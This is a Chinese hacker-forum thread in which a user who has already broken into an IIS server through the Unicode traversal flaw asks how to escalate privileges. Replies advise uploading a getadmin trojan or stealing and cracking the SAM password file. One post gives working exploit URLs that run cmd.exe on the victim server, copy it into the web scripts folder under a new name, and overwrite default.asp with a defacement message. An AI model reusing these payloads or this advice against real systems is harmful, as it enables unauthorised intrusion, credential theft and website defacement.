20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » 谁有办法?

   
作者 标题: 谁有办法?
老老菜鸟
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
利用unicodi漏洞入侵后能用telnet连接,可没有net user的权限,各位老鸟有没有办法提升权限。(自然越简单越好了,呵呵)
IP: 已记录
TomyChen
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
unicode是guest用户权,当然不能用net user
上传getadmin之类木马或者下载sam破解。

------------------
人生就像一个方程:
一是有解;
一是无解;
我就是属于无解的。

IP: 已记录
老老菜鸟
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
getadmin木马成功率并不高啊

下载sam破解,太费时。有没有更好一点的东东或是更好的方法?

IP: 已记录
老老菜鸟
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
各位在有谁在帮我一下?
IP: 已记录
周秋阳
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c +copy%20c:\autoexec.bat+c:\autoexec.bak http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del%20c:\autoexec.bak

c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe拷贝,cmd.exe(必须改名)方法: http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe
通过http://ip/scripts/ccc.exe?/c+dir+c:\ 可以看到c:\文件。
我们就可以调用到cmd.exe了,就是说不用那个编码了。 +c:\inetpub\wwwroot\default.asp target=_blank>http://ip/scripts/ccc.exe?/c+echo+Hack+by+Chinese+>+c:\inetpub\wwwroot\default.asp http://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+>>+c:\inetpub\wwwroot\default.asp

………………

------------------
每个人都有无法忘记的人,思念会像细沙穿过你的灵魂,轻轻开了门,只有风雨声。

IP: 已记录
周秋阳
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
您可以试试看,我自己感觉不怎么行了!

------------------
每个人都有无法忘记的人,思念会像细沙穿过你的灵魂,轻轻开了门,只有风雨声。

IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
- 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。